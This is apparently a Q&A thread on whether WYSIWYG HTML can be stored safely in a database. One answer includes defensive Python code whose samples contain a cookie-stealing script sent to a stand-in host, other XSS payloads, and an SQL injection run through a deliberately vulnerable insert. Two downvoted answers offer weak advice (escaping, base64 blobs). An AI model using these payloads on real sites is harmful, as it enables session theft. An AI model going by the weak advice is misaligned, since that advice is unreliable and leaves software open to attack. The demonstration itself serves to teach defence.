3

I'm working on a mini blog which allows users to add a post to the site using a WYSIWYG editor, therefore I will be storing this post in my DB.

Having researched Markdown, I have come to the conclusion that it is not fit for purpose since I require local video uploads, which is why I am now planning on storing the HTML from the WYSIWYG editor in my DB.

I do, however, have some concerns regarding SQL injection and XSS attacks; I have researched a solution, which is HTML Purifier.

If I use HTML Purifier to remove unwanted HTML tags, is it then safe to store the HTML in my DB?

  • As long as you're safely inserting the data (i.e. a prepared statement with parameter binding), I'd say it's probably safe enough, but that's just my opinion on this subjective question. Commented Jan 11, 2019 at 1:08
  • You can use a limited version of the WYSIWYG editor and also allow just a few HTML tags using the strip_tags PHP function. To prevent SQL injection, you must escape the values in a proper way, or use a prepared statement. Commented Jan 11, 2019 at 1:09
  • I appreciate that obviously this is a subjective matter, but in this situation (Markdown not supporting local video embeds) would storing HTML in the database and correctly purifying it be considered best practice? Commented Jan 11, 2019 at 1:25
  • 2
    I wouldn't store HTML, it's just asking for trouble. How can you be sure you've filtered all potentially dangerous tags? I'd stick with storing markdown for the text content, and find another way of attaching videos. For example, invent your own markdown syntax for embedding a video, and then as your app presents the content, substitute raw html tags (in a safe way) to embed the video. Markdown allows raw html too. See forums.apricitysoftware.com/t/… Commented Jan 11, 2019 at 1:42
  • Thanks for your input. Since the WYSIWYG editor outputs HTML, if I strip tags and purify and then convert this to markdown (adding my own custom video markdown syntax), would this be a safer and "better practice" way of achieving what I want? Appreciate all the comments, I'm just trying to figure out how pros would handle this situation. Commented Jan 11, 2019 at 1:55

3 Answers

13

Storing HTML in the database is not intrinsically unsafe, any more than storing plain text is intrinsically unsafe. The risk of SQL injection is trivially mitigated by using prepared statements and proper placeholders. Escaping is neither necessary nor is it best practice for preventing SQL injection. Prepared statements are.

Conversely, XSS and other HTML-related vulnerabilities have nothing to do with the database and everything to do with rendering HTML to viewers from untrusted sources. The same vulnerabilities would be there if the HTML were simply stored in files, with no database at all, so there is no need to protect the database from malicious HTML. The database has no knowledge of or vulnerability to what's contained in stored HTML content, because it doesn't render or interpret the HTML... again, as long as your database interactions use prepared statements. There are no acceptable justifications for avoiding those.

To exaggerate the point to an extreme, it would be perfectly safe to store files containing viruses as blobs in a database, because the database does not execute the data stored in it, as code. The vulnerability would be to the users downloading those viruses.
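The answer above separates two controls: parameter binding on the way into the database, and output-side handling of the HTML on the way to the browser. The following is an added worked example, not code from this thread or from HTML Purifier: an in-memory sqlite3 database stands in for the asker's DB, a small html.parser-based allow-list sanitizer stands in for HTML Purifier, and both sample posts (one carrying three XSS attempts, one carrying an SQL injection) are constructed for the demonstration. It shows the string-built INSERT letting a post body add an extra row, the bound INSERT storing the same body verbatim, and the stored `<script>`, `onerror=` and `javascript:` payloads being stripped only at render time.

```python
"""Untrusted WYSIWYG HTML: bind it as data going into the DB, allow-list
sanitize it coming out to the browser. Added example, not from the thread:
sqlite3 stands in for the asker's DB, the sanitizer for HTML Purifier."""
import sqlite3
from html import escape
from html.parser import HTMLParser

# Constructed post: formatting and a local video, plus three XSS attempts.
SAMPLE_POST = (
    "<p>Here's my <b>first</b> post.</p>"
    '<video src="/uploads/clip.mp4" controls onerror="alert(1)"></video>'
    "<script>document.location='http://evil.invalid/'+document.cookie</script>"
    '<a href="javascript:alert(2)">click</a>'
)
# Constructed post: the quote ends the SQL literal and adds a second row.
INJECTING_POST = "harmless'), ('row the attacker added"

def store_post_unsafe(conn, html):
    """Vulnerable: the post body is spliced into the SQL text."""
    conn.execute(f"INSERT INTO posts (body) VALUES ('{html}')")

def store_post(conn, html):
    """Prepared statement: body bound as data, stored verbatim, never parsed as SQL."""
    return conn.execute("INSERT INTO posts (body) VALUES (?)", (html,)).lastrowid

# Allow-list of tag -> permitted attributes; anything else is dropped.
ALLOWED = {"p": set(), "b": set(), "i": set(), "br": set(),
           "a": {"href"}, "video": {"src", "controls"}}
VOID = {"br"}                            # never gets a closing tag
DROP_WITH_CONTENT = {"script", "style"}  # element and its text both go
URL_ATTRS = {"href", "src"}

def _safe_url(value):
    # Same-origin paths or explicit http(s) only: no javascript:, data:, //host
    v = (value or "").strip().lower()
    if v.startswith("/"):
        return not v.startswith(("//", "/\\"))
    return v.startswith(("http://", "https://"))

class AllowListSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.open, self.skip = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip = tag              # swallow everything up to </script>
            return
        if tag not in ALLOWED:
            return                       # tag dropped, its text is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag]:  # removes onerror=, style=, ...
                continue
            if name in URL_ATTRS and not _safe_url(value):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if tag == self.skip:
            self.skip = None
        elif tag in self.open:           # also close inner tags, stay balanced
            while self.open:
                closed = self.open.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.skip:
            self.out.append(escape(data, quote=False))

def sanitize(html):
    """Render-time step: run over the stored, still-untrusted HTML."""
    s = AllowListSanitizer()
    s.feed(html)
    s.close()
    while s.open:                        # close what the author left open
        s.out.append(f"</{s.open.pop()}>")
    return "".join(s.out)

def demo():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, body TEXT NOT NULL)")
    store_post_unsafe(conn, INJECTING_POST)
    rows_unsafe = conn.execute("SELECT count(*) FROM posts").fetchone()[0]  # 2
    conn.execute("DELETE FROM posts")
    store_post(conn, INJECTING_POST)
    rows_bound = conn.execute("SELECT count(*) FROM posts").fetchone()[0]   # 1
    post_id = store_post(conn, SAMPLE_POST)
    (stored,) = conn.execute("SELECT body FROM posts WHERE id = ?", (post_id,)).fetchone()
    return {"rows_after_unsafe_insert": rows_unsafe,
            "rows_after_bound_insert": rows_bound,
            "stored_verbatim": stored == SAMPLE_POST,
            "rendered": sanitize(stored)}
```

Calling `demo()` returns two rows for the string-built insert and one for the bound insert, confirms the bound copy is byte-for-byte what the editor produced, and renders `<p>Here's my <b>first</b> post.</p><video src="/uploads/clip.mp4" controls=""></video><a>click</a>`: the video survives, the event handler, script element and `javascript:` link do not. The sanitizer here only illustrates the allow-list principle (tags, attributes and URL schemes all default to deny); HTML Purifier applies the same principle with a far more complete model of HTML, CSS and nesting rules, which is why a stand-in like this should not replace it in production. The sanitize step belongs at render time, so the database keeps the untrusted original and a later sanitizer fix applies to every old post.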


-1

You can store HTML in SQL... but escape it first.

See the example here...

http://php.net/manual/en/function.html-entity-decode.php


-1

You can save HTML content in a MySQL field as a "blob". Before sending the HTML content to the back end you must use some function like base64_encode in PHP, for example, and then you can get that content back using base64_decode.
